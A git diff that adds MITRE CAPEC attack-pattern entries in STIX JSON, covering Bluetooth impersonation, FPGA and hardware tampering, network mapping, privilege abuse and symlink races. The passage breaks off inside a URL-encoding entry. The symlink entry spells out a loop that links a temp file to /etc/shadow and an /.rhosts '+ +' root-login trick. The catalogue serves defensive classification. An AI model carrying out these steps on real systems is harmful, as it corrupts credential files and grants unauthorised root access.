@@ -0,0 +1,56 @@ +{ + "id": "bundle--2efd14dc-d21c-4fb7-bb58-e90fb74670f2", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

  2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json new file mode 100644 index 0000000000000000000000000000000000000000..630aa0c323116a92fefb55783d6d75a93ff90d7d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json 
@@ -0,0 +1,75 @@ +{ + "id": "bundle--5a4e685d-dff4-4302-a2e3-0ef4233edf29", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." 
+ ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json new file mode 100644 index 0000000000000000000000000000000000000000..30db09edd924919aa8416b4218ffe87d24f3536d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json 
@@ -0,0 +1,96 @@
+{
+ "id": "bundle--ce8bea14-6508-487b-85ab-a64854210a58",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-309",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/309.html"
+ },
+ {
+ "external_id": "CWE-200",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
+ },
+ {
+ "description": "System Network Configuration Discovery",
+ "external_id": "T1016",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1016"
+ },
+ {
+ "description": "System Network Connections Discovery",
+ "external_id": "T1049",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1049"
+ },
+ {
+ "description": "Gather Victim Network Information",
+ "external_id": "T1590",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1590"
+ },
+ {
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+ "external_id": "REF-33",
+ "source_name": "reference_from_CAPEC"
+ },
+ {
+ "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
+ "external_id": "REF-128",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.faqs.org/rfcs/rfc793.html"
+ },
+ {
+ "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
+ "external_id": "REF-130",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://phrack.org/issues/51/11.html"
+ }
+ ],
+ "id": "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Network Topology Mapping",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_can_precede_refs": [
+ "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30"
+ ],
+ "x_capec_consequences": {
+ "Confidentiality": [
+ "Other"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_parent_of_refs": [
+ "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304",
+ "attack-pattern--88933ba2-fe2a-4b71-ac08-2537c5903b2e",
+ "attack-pattern--93f8b21a-7680-4813-8b4b-2976f5765320",
+ "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1"
+ ],
+ "x_capec_prerequisites": [
+ "None"
+ ],
+ "x_capec_resources_required": [
+ "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication."
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json
new file mode 100644
index 0000000000000000000000000000000000000000..0849b13ac141fb9344d385ff790fc0bf834766c4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json 
@@ -0,0 +1,96 @@
+{
+ "id": "bundle--a589d812-39ff-4309-aa4e-3d165d25e01e",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-122",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/122.html"
+ },
+ {
+ "external_id": "CWE-269",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/269.html"
+ },
+ {
+ "external_id": "CWE-732",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/732.html"
+ },
+ {
+ "external_id": "CWE-1317",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1317.html"
+ },
+ {
+ "description": "Abuse Elevation Control Mechanism",
+ "external_id": "T1548",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1548"
+ }
+ ],
+ "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Privilege Abuse",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_can_precede_refs": [
+ "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism"
+ ],
+ "Authorization": [
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
+ "Gain Privileges",
+ "Bypass Protection Mechanism"
+ ],
+ "Confidentiality": [
+ "Read Data"
+ ],
+ "Integrity": [
+ "Modify Data"
+ ]
+ },
+ "x_capec_domains": [
+ "Software",
+ "Hardware"
+ ],
+ "x_capec_example_instances": [
+ "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n "
+ ],
+ "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ",
+ "x_capec_likelihood_of_attack": "High",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b",
+ "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262",
+ "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac",
+ "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1",
+ "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7"
+ ],
+ "x_capec_prerequisites": [
+ "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.",
+ "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources."
+ ],
+ "x_capec_resources_required": [
+ "None: No specialized resources are required to execute this type of attack. The ability to access the target is required."
+ ],
+ "x_capec_skills_required": {
+ "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Medium",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json
new file mode 100644
index 0000000000000000000000000000000000000000..51e275adf8c56abeccc20523a2353959e5991f90
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json
@@ -0,0 +1,58 @@
+{
+ "id": "bundle--7d59d3b5-74bc-44b8-b2dc-de4c20f48241",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-531",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/531.html"
+ },
+ {
+ "description": "Supply Chain Compromise: Compromise Hardware Supply Chain",
+ "external_id": "T1195.003",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1195/003"
+ }
+ ],
+ "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Hardware Component Substitution",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e"
+ ],
+ "x_capec_domains": [
+ "Supply Chain",
+ "Physical Security",
+ "Hardware"
+ ],
+ "x_capec_example_instances": [
+ "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity."
+ ],
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98",
+ "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2"
+ ],
+ "x_capec_prerequisites": [
+ "Physical access to the system or the integration facility where hardware components are kept."
+ ],
+ "x_capec_skills_required": {
+ "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json
new file mode 100644
index 0000000000000000000000000000000000000000..54e95a69aa69be165bd7237104272a9346c9e623
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json
@@ -0,0 +1,106 @@ +{ + "id": "bundle--9b3910d2-98fd-496c-8a0b-3ca441c5ffcc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.", + "external_references": [ + { + "external_id": "CAPEC-27", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/27.html" + }, + { + "external_id": "CWE-367", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html" + }, + { + "external_id": "CWE-61", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-662", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-689", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/689.html" + }, + { + "external_id": "CWE-667", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-115", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Symlink_race" + }, + { + "description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6", + 
"external_id": "REF-116", + "source_name": "reference_from_CAPEC", + "url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html" + } + ], + "id": "attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Leveraging Race Conditions via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3da1844e-c905-420a-9179-260356a85a05" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.\n The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).\n Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.\n [REF-115]\n ", + "GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. 
See also: CVE-2006-6939", + "OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894", + "Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Verify that target host's platform supports symbolic links.: This attack pattern is only applicable on platforms that support symbolic links.

  2. Techniques
    Research target platform to determine whether it supports symbolic links.
    Create a symbolic link and ensure that it works as expected on the given platform.
  3. Examine application's file I/O behavior: Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.

  4. Techniques
    Use kernel tracing utility such as ktrace to monitor application behavior.
    Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
    Watch temporary directories to see when temporary files are created, modified and deleted.
    Analyze source code for open-source systems like Linux, Apache, etc.

Experiment

  1. Verify ability to write to filesystem: The attacker verifies ability to write to the target host's file system.

  2. Techniques
    Create a file that does not exist in the target directory (e.g. \"touch temp.txt\" in UNIX-like systems)
    On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
    Verify permissions on target directory

Exploit

  1. Replace file with a symlink to a sensitive system file.: Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.

  2. Techniques
    Create an infinite loop containing commands such as \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.
    Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The attacker is able to create Symlink links on the target host.", + "Tainted data from the attacker is used and copied to temporary files.", + "The target host does insecure temporary file creation." + ], + "x_capec_skills_required": { + "Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json new file mode 100644 index 0000000000000000000000000000000000000000..acf04b7aeb3eb3c5a806f7fc219d7bb56db1542d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json 
@@ -0,0 +1,50 @@
+{
+ "id": "bundle--04f3ef70-912f-4828-9e13-6f022c08f84d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-401",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/401.html"
+ },
+ {
+ "external_id": "CWE-1263",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1263.html"
+ }
+ ],
+ "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176",
+ "modified": "2020-07-30T00:00:00.000Z",
+ "name": "Physically Hacking Hardware",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede"
+ ],
+ "x_capec_domains": [
+ "Supply Chain",
+ "Physical Security",
+ "Hardware"
+ ],
+ "x_capec_example_instances": [
+ "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed."
+ ],
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11"
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json new file mode 100644 index 0000000000000000000000000000000000000000..6b306429cd5f07078b96c3ccf23bbf1f63bb1946 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json 
@@ -0,0 +1,155 @@ +{ + "id": "bundle--1284e7b5-f405-4eac-91ab-45171465e879", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. 
It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. 
Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": 